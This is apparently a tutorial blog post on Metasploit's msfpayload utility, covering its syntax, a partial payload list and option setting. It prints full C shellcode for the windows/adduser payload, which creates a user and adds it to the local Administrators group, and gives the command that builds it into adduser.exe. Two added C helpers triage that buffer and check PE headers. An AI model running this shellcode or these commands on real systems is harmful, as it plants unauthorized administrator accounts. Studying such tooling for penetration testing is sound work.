Metasploit is a huge tool. When I started learning and playing with it, all I knew was use, set, exploit and run.
That was awesome and I was happy with that. But then I came to know that many Metasploit users don't even use the framework to 50% of its capabilities. So I started exploring the Metasploit directory and, lo, so many utilities were sitting there begging me to use them! In this multi-part series, I will introduce all these little gems packed in the Metasploit directory, ready to make your life a lot easier.
msfpayload
This is a command-line utility in Metasploit used to generate shellcode, or a standalone payload, that can be delivered to the target for execution. Its real benefit shows when you are developing new exploit modules and want to test different kinds of shellcode against them.
The syntax for msfpayload is very simple.
Syntax:
Usage: ./msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
msfpayload -l
Lists all available payloads, as expected.
Framework Payloads (228 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
--snip--
After choosing a payload, the options (variables) it takes can be listed by putting S (summary) or O (options) in the format position.
./msfpayload windows/adduser S
Name: Windows Execute net user /ADD
Module: payload/windows/adduser
Version: 13053, 9179
Platform: Windows
Arch: x86
Needs Admin: Yes
Total size: 287
Rank: Normal
Provided by:
hdm
vlad902
sf
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
PASS metasploit yes The password for this user
USER metasploit yes The username to create
Description:
Create a new user and add them to local administration group
So, from the above information, we know this payload has three options (EXITFUNC, PASS, USER), all marked required and all with defaults, which we can override as var=val pairs. The defaults would create a user named metasploit with the password metasploit on the target, so set your own.
./msfpayload windows/adduser PASS=betterhacker USER=betterhacker O
--snip--
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
PASS betterhacker yes The password for this user
USER betterhacker yes The username to create
This way any option a payload exposes can be set. For example, if a payload takes an RHOST value, you pass it the same way on the command line. Two things to keep in mind: the format selector (S, C, X and so on) still has to be the last argument, as the usage line shows, and for a bind payload like the one below RHOST is only used by the handler that connects to the listener; the shellcode itself listens on LPORT, so LPORT is the option that actually changes the generated bytes.
./msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.2
The last argument in the command syntax selects the output format. Per the usage line, the following are supported: S (summary), C, Perl, Ruby, Raw, JavaScript, Exe, Dll, VBA and War. Raw (R) is what you pipe into msfencode; C is what you paste into an exploit source file.
./msfpayload windows/adduser C
/*
* windows/adduser - 287 bytes
* http://www.metasploit.com
* VERBOSE=false, EXITFUNC=process, USER=metasploit,
* PASS=metasploit
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"
"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"
"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"
"\x44\x00";
Now this shellcode can be directly used in an exploit!
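Before pasting a buffer like this into an exploit it is worth a minute of static triage. The harness below is an added example, not part of the original post or of Metasploit: it takes the C output printed above as-is, confirms the byte count, counts the NUL bytes (a strcpy/sprintf-style overflow stops copying at the first 0x00, which is why raw output usually has to go through an encoder), extracts the command string the payload hands to WinExec, and resolves the 32-bit API hashes that Metasploit's x86 stub pushes before `call ebp`. The hash table is the well-known block_api set for the functions this payload uses; the `push imm32; call ebp` and `mov ebx, imm32` scan is an assumed pattern match, not a disassembler.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* windows/adduser exactly as msfpayload printed it above
 * (USER=metasploit, PASS=metasploit, EXITFUNC=process, 287 bytes). */
static const unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"
"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"
"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"
"\x44\x00";

/* msfpayload's count excludes the terminator the compiler appends. */
size_t shellcode_len(void) { return sizeof(buf) - 1; }

/* A strcpy()/sprintf()-style overflow stops at the first 0x00, so a buffer
 * with NUL bytes must be encoded (msfencode) before that kind of delivery. */
size_t count_nulls(const unsigned char *p, size_t n)
{
    size_t c = 0;
    for (size_t i = 0; i < n; i++) c += (p[i] == 0x00);
    return c;
}

/* Longest run of printable ASCII that ends in 0x00: for this payload that is
 * the command line handed to WinExec. Returns NULL if there is none. */
const char *embedded_command(const unsigned char *p, size_t n, size_t *len_out)
{
    size_t run = 0, best_len = 0, best_start = 0;
    for (size_t i = 0; i < n; i++) {
        if (p[i] >= 0x20 && p[i] <= 0x7e) { run++; continue; }
        if (p[i] == 0x00 && run > best_len) { best_len = run; best_start = i - run; }
        run = 0;
    }
    if (len_out) *len_out = best_len;
    return best_len ? (const char *)p + best_start : NULL;
}

/* Metasploit's x86 block_api stub imports by 32-bit hash: callers do
 * `push <hash>; call ebp`, and the EXITFUNC block loads its hash with
 * `mov ebx, <hash>`. Assumed table of the well-known hashes (not exhaustive). */
static const struct { uint32_t hash; const char *name; } known_hashes[] = {
    { 0x876f8b31, "kernel32.dll!WinExec" },
    { 0x9dbd95a6, "kernel32.dll!GetVersion" },
    { 0x56a2b5f0, "kernel32.dll!ExitProcess" },
    { 0x0a2a1de0, "kernel32.dll!ExitThread" },
    { 0x6f721347, "ntdll.dll!RtlExitUserThread" },
};

static uint32_t le32(const unsigned char *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }

/* Scan for 68 xx xx xx xx ff d5 and bb xx xx xx xx; report the hashes we can
 * name, in buffer order. A byte-pattern match, not a disassembly. */
size_t resolve_api_hashes(const unsigned char *p, size_t n, const char **names, size_t max)
{
    size_t found = 0;
    for (size_t i = 0; i + 5 <= n && found < max; i++) {
        int push_call = p[i] == 0x68 && i + 7 <= n && p[i + 5] == 0xff && p[i + 6] == 0xd5;
        if (!push_call && p[i] != 0xbb) continue;
        uint32_t h = le32(p + i + 1);
        for (size_t k = 0; k < sizeof known_hashes / sizeof known_hashes[0]; k++)
            if (known_hashes[k].hash == h) { names[found++] = known_hashes[k].name; i += 4; break; }
    }
    return found;
}

/* Resolved name by position, NULL past the end. */
const char *nth_api_name(size_t idx)
{
    const char *names[16];
    size_t k = resolve_api_hashes(buf, shellcode_len(), names, 16);
    return idx < k ? names[idx] : NULL;
}

int main(void)
{
    size_t n = shellcode_len(), cmdlen = 0;
    const char *cmd = embedded_command(buf, n, &cmdlen);
    printf("%zu bytes, %zu NUL bytes\n", n, count_nulls(buf, n));
    if (cmd) printf("command: %.*s\n", (int)cmdlen, cmd);
    for (size_t i = 0; nth_api_name(i); i++) printf("api hash -> %s\n", nth_api_name(i));
    return 0;
}
```

For this buffer the scan finds WinExec, ExitProcess, GetVersion and RtlExitUserThread in that order, which is exactly the EXITFUNC=process exit block (GetVersion decides between ExitProcess and RtlExitUserThread) wrapped around a single WinExec of the `net user ... && net localgroup ...` line. The eight NUL bytes, the first at offset 3, are the reason this buffer cannot go straight into a string-copy overflow; that is what the next part on msfencode is for.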
We can also create an executable from msfpayload.
./msfpayload windows/adduser USER=betterhacker PASS=betterhacker X > adduser.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/adduser
Length: 293
Options: {"USER"=>"betterhacker", "PASS"=>"betterhacker"}
This creates an exe file with name 'adduser.exe'. It is a Windows PE binary, so on the Linux box it will only run under Wine, and for that it still needs the execute bit, which a shell redirect does not set. To add it:
chmod +x adduser.exe
On a Windows target there is no mode bit to set; copy the file across and run it there. Either way, this little executable is ready to be executed and it works!
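The check that actually tells you whether the X output is usable is the file format, not the mode bit. The helper below is an added example (mine, not the post's or Metasploit's): it reads the DOS header, follows e_lfanew to the PE signature and reports PE32 versus PE32+, and can be pointed at a file such as adduser.exe. A constructed minimal header stands in for the real file so it runs offline.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t rd32(const unsigned char *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* 0 = not a PE image, 1 = PE32 (what X emits for x86 windows/* payloads),
 * 2 = PE32+. Layout: e_lfanew at 0x3c, "PE\0\0", 20-byte COFF header, then
 * the optional header whose first word is the magic. */
int pe_image_kind(const unsigned char *img, size_t n)
{
    if (n < 0x40 || img[0] != 'M' || img[1] != 'Z') return 0;
    uint32_t pe = rd32(img + 0x3c);
    if (pe > n || n - pe < 4 + 20 + 2) return 0;
    if (memcmp(img + pe, "PE\0\0", 4) != 0) return 0;
    uint16_t magic = rd16(img + pe + 24);
    return magic == 0x10b ? 1 : magic == 0x20b ? 2 : 0;
}

/* Same check on a file on disk, e.g. adduser.exe. -1 if it cannot be opened. */
int pe_file_kind(const char *path)
{
    unsigned char head[4096];
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    size_t n = fread(head, 1, sizeof head, f);
    fclose(f);
    return pe_image_kind(head, n);
}

/* Constructed stand-in for offline use: DOS header with e_lfanew = 0x40,
 * PE signature, zeroed COFF header, the requested magic. Not runnable. */
size_t build_sample_pe(unsigned char *out, size_t n, uint16_t magic)
{
    if (n < 0x60) return 0;
    memset(out, 0, n);
    out[0] = 'M'; out[1] = 'Z';
    out[0x3c] = 0x40;
    memcpy(out + 0x40, "PE\0\0", 4);
    out[0x40 + 24] = (unsigned char)(magic & 0xff);
    out[0x40 + 25] = (unsigned char)(magic >> 8);
    return n;
}

int sample_pe_kind(uint16_t magic)
{
    unsigned char img[0x60];
    return build_sample_pe(img, sizeof img, magic) ? pe_image_kind(img, sizeof img) : 0;
}

int main(int argc, char **argv)
{
    printf("constructed PE32 header: kind %d\n", sample_pe_kind(0x10b));
    if (argc > 1) printf("%s: kind %d\n", argv[1], pe_file_kind(argv[1]));
    return 0;
}
```

Run it as `./pecheck adduser.exe`; a 1 means a 32-bit PE came out of the redirect intact, and a 0 usually means the redirect captured an error message or usage banner instead of the binary.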
That is it for msfpayload. In the next part we will see msfencode and msfvenom.